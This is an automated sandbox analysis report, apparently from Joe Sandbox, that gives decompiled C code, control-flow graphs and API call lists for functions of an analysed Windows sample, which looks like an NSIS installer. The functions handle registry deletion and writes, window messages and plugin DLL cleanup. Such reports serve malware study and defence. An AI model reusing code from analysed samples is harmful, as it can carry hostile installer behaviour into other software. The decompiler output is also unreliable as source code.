                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 3449924974-3916508600
                                                                                                                                                                                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                                                                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 826 402ea9-402ed2 call 4064d5 828 402ed7-402edb 826->828 829 402ee1-402ee5 828->829 830 402f8c-402f90 828->830 831 402ee7-402f08 RegEnumValueW 829->831 832 402f0a-402f1d 829->832 831->832 833 402f71-402f7f RegCloseKey 831->833 834 402f46-402f4d RegEnumKeyW 832->834 833->830 835 402f1f-402f21 834->835 836 402f4f-402f61 RegCloseKey call 406a35 834->836 835->833 838 402f23-402f37 call 402ea9 835->838 842 402f81-402f87 836->842 843 402f63-402f6f RegDeleteKeyW 836->843 838->836 844 402f39-402f45 838->844 842->830 843->830 844->834
                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				short _v536;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t46 = _a12;
                                                                                                                                                                                                                            				_t47 = _t46 & 0x00000300;
                                                                                                                                                                                                                            				_t45 = _t46 & 0x00000001;
                                                                                                                                                                                                                            				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                                                                                                                                                            				if(_t27 == 0) {
                                                                                                                                                                                                                            					if((_a12 & 0x00000002) == 0) {
                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                            						_push(0x105);
                                                                                                                                                                                                                            						_push( &_v536);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                            								RegCloseKey(_v8);
                                                                                                                                                                                                                            								return 0x3eb;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_push(0x105);
                                                                                                                                                                                                                            							_push( &_v536);
                                                                                                                                                                                                                            							_push(_t45);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						RegCloseKey(_v8);
                                                                                                                                                                                                                            						_t35 = E00406A35(3);
                                                                                                                                                                                                                            						if(_t35 != 0) {
                                                                                                                                                                                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t27;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            0x00402f45
                                                                                                                                                                                                                            0x00402f52
                                                                                                                                                                                                                            0x00402f5a
                                                                                                                                                                                                                            0x00402f61
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f8a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f69
                                                                                                                                                                                                                            0x00402ef5
                                                                                                                                                                                                                            0x00402f08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f08
                                                                                                                                                                                                                            0x00402f90

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                                                                            • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                                                                                                                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 845 687e1817-687e1856 call 687e1bff 849 687e185c-687e1860 845->849 850 687e1976-687e1978 845->850 851 687e1869-687e1876 call 687e2480 849->851 852 687e1862-687e1868 call 687e243e 849->852 857 687e1878-687e187d 851->857 858 687e18a6-687e18ad 851->858 852->851 861 687e187f-687e1880 857->861 862 687e1898-687e189b 857->862 859 687e18af-687e18cb call 687e2655 call 687e1654 call 687e1312 GlobalFree 858->859 860 687e18cd-687e18d1 858->860 884 687e1925-687e1929 859->884 867 687e191e-687e1924 call 687e2655 860->867 868 687e18d3-687e191c call 687e1666 call 687e2655 860->868 865 687e1888-687e1889 call 687e2b98 861->865 866 687e1882-687e1883 861->866 862->858 863 687e189d-687e189e call 687e2e23 862->863 877 687e18a3 863->877 880 687e188e 865->880 872 687e1885-687e1886 866->872 873 687e1890-687e1896 call 687e2810 866->873 867->884 868->884 872->858 872->865 883 687e18a5 873->883 877->883 880->877 883->858 888 687e192b-687e1939 call 687e2618 884->888 889 687e1966-687e196d 884->889 895 687e193b-687e193e 888->895 896 687e1951-687e1958 888->896 889->850 891 687e196f-687e1970 GlobalFree 889->891 891->850 895->896 897 687e1940-687e1948 895->897 896->889 898 687e195a-687e1965 call 687e15dd 896->898 897->896 899 687e194a-687e194b FreeLibrary 897->899 898->889 899->896
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E687E1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                            				char _v136;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t76 = __esi;
                                                                                                                                                                                                                            				_t68 = __edi;
                                                                                                                                                                                                                            				_t67 = __edx;
                                                                                                                                                                                                                            				 *0x687e506c = _a8;
                                                                                                                                                                                                                            				 *0x687e5070 = _a16;
                                                                                                                                                                                                                            				 *0x687e5074 = _a12;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x687e5048, E687E1651);
                                                                                                                                                                                                                            				_push(1); // executed
                                                                                                                                                                                                                            				_t37 = E687E1BFF(); // executed
                                                                                                                                                                                                                            				_t54 = _t37;
                                                                                                                                                                                                                            				if(_t54 == 0) {
                                                                                                                                                                                                                            					L28:
                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                                                            						E687E243E(_t54);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t54);
                                                                                                                                                                                                                            					E687E2480(_t67);
                                                                                                                                                                                                                            					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                                            					if(_t57 == 0xffffffff) {
                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                            						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                                                                                                                            								_push(_t54);
                                                                                                                                                                                                                            								_t37 = E687E2655();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push(_t76);
                                                                                                                                                                                                                            								_push(_t68);
                                                                                                                                                                                                                            								_t61 = 8;
                                                                                                                                                                                                                            								_t13 = _t54 + 0x1018; // 0x1018
                                                                                                                                                                                                                            								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                                                                                                                            								_t42 = E687E1666(_t54,  &_v136);
                                                                                                                                                                                                                            								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                                                                                                                                                            								_t18 = _t54 + 0x1018; // 0x1018
                                                                                                                                                                                                                            								_t72 = _t18;
                                                                                                                                                                                                                            								_push(_t54);
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                                                                                                                                                            								 *_t72 = 4;
                                                                                                                                                                                                                            								E687E2655();
                                                                                                                                                                                                                            								_t63 = 8;
                                                                                                                                                                                                                            								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(_t54);
                                                                                                                                                                                                                            							E687E2655();
                                                                                                                                                                                                                            							_t37 = GlobalFree(E687E1312(E687E1654(_t54)));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                                                            							_t37 = E687E2618(_t54);
                                                                                                                                                                                                                            							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                                                                                                                            								_t37 =  *(_t54 + 0x1008);
                                                                                                                                                                                                                            								if(_t37 != 0) {
                                                                                                                                                                                                                            									_t37 = FreeLibrary(_t37);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                                                                                                                                                            								_t37 = E687E15DD( *0x687e5068);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							return GlobalFree(_t54);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t48 =  *_t54;
                                                                                                                                                                                                                            					if(_t48 == 0) {
                                                                                                                                                                                                                            						if(_t57 != 1) {
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E687E2E23(_t54);
                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                            						_t54 = _t48;
                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t49 = _t48 - 1;
                                                                                                                                                                                                                            					if(_t49 == 0) {
                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                            						_t48 = E687E2B98(_t57, _t54); // executed
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t50 = _t49 - 1;
                                                                                                                                                                                                                            					if(_t50 == 0) {
                                                                                                                                                                                                                            						E687E2810(_t54);
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t50 != 1) {
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E74
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E79
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E7E
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E18C5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 687E194B
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1970
                                                                                                                                                                                                                              • Part of subcall function 687E243E: GlobalAlloc.KERNEL32(00000040,?), ref: 687E246F
                                                                                                                                                                                                                              • Part of subcall function 687E2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,687E1896,00000000), ref: 687E28E0
                                                                                                                                                                                                                              • Part of subcall function 687E1666: wsprintfW.USER32 ref: 687E1694
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                            • Opcode ID: 6333e8771f1299a7b59ce7343f6a9f0b2d1326b9bcb7559b964722a562e2762d
                                                                                                                                                                                                                            • Instruction ID: 807b79326056146109be2af6f20e712e927a06670ec9b3270da23621e865cb2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6333e8771f1299a7b59ce7343f6a9f0b2d1326b9bcb7559b964722a562e2762d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA41E475900245DBDF109F34DACEBA937A8BF0A32AF844575F9389A086DBB4C184C770
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 902 401c43-401c63 call 402d84 * 2 907 401c65-401c6c call 402da6 902->907 908 401c6f-401c73 902->908 907->908 910 401c75-401c7c call 402da6 908->910 911 401c7f-401c85 908->911 910->911 912 401cd3-401cfd call 402da6 * 2 FindWindowExW 911->912 913 401c87-401ca3 call 402d84 * 2 911->913 927 401d03 912->927 925 401cc3-401cd1 SendMessageW 913->925 926 401ca5-401cc1 SendMessageTimeoutW 913->926 925->927 928 401d06-401d09 926->928 927->928 929 402c2a-402c39 928->929 930 401d0f 928->930 930->929
                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E00401C43(intOrPtr __edx) {
                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                            				long _t30;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				WCHAR* _t35;
                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                            				int _t41;
                                                                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                            				int _t56;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t57 = __edx;
                                                                                                                                                                                                                            				_t29 = E00402D84(3);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                                                                                                            				 *(_t64 - 0x18) = _t29;
                                                                                                                                                                                                                            				_t30 = E00402D84(4);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                                                                                                            				 *(_t64 + 8) = _t30;
                                                                                                                                                                                                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                                                                                                                                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                                                                                                                                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                                                                            					_t61 = E00402DA6();
                                                                                                                                                                                                                            					_t32 = E00402DA6();
                                                                                                                                                                                                                            					asm("sbb ecx, ecx");
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_t35 =  ~( *_t31) & _t61;
                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t63 = E00402D84();
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                                                                                                            					_t41 = E00402D84(2);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                                                                                                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                            						 *(_t64 - 0x38) = _t36;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                                                                                                                                                            					_push( *(_t64 - 0x38));
                                                                                                                                                                                                                            					E004065AF();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            0x00401cbe
                                                                                                                                                                                                                            0x00401ca3
                                                                                                                                                                                                                            0x00401d06
                                                                                                                                                                                                                            0x00401d09
                                                                                                                                                                                                                            0x00401d0f
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                                                                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 933 40248a-4024bb call 402da6 * 2 call 402e36 940 4024c1-4024cb 933->940 941 402c2a-402c39 933->941 942 4024cd-4024da call 402da6 lstrlenW 940->942 943 4024de-4024e1 940->943 942->943 947 4024e3-4024f4 call 402d84 943->947 948 4024f5-4024f8 943->948 947->948 951 402509-40251d RegSetValueExW 948->951 952 4024fa-402504 call 403371 948->952 955 402522-402603 RegCloseKey 951->955 956 40251f 951->956 952->951 955->941 956->955
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                            				char _t27;
                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t42 = __eflags;
                                                                                                                                                                                                                            				_t33 = __edx;
                                                                                                                                                                                                                            				_t30 = __ebx;
                                                                                                                                                                                                                            				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                                                                                                                                                            				_t34 = __eax;
                                                                                                                                                                                                                            				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                                                                                                                                                            				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                                                                                                                                                            				_t20 = E00402DA6(0x11);
                                                                                                                                                                                                                            				 *(_t39 - 4) = 1;
                                                                                                                                                                                                                            				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                                                                                                                                                            				 *(_t39 + 8) = _t21;
                                                                                                                                                                                                                            				if(_t21 != __ebx) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t37 == 1) {
                                                                                                                                                                                                                            						E00402DA6(0x23);
                                                                                                                                                                                                                            						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t37 == 4) {
                                                                                                                                                                                                                            						_t27 = E00402D84(3);
                                                                                                                                                                                                                            						_pop(_t32);
                                                                                                                                                                                                                            						 *0x40b5f8 = _t27;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                                                                                                                                                            						_t24 = _t37;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t37 == 3) {
                                                                                                                                                                                                                            						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
                                                                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                                                                            						 *(_t39 - 4) = _t30;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push( *(_t39 + 8));
                                                                                                                                                                                                                            					RegCloseKey(); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
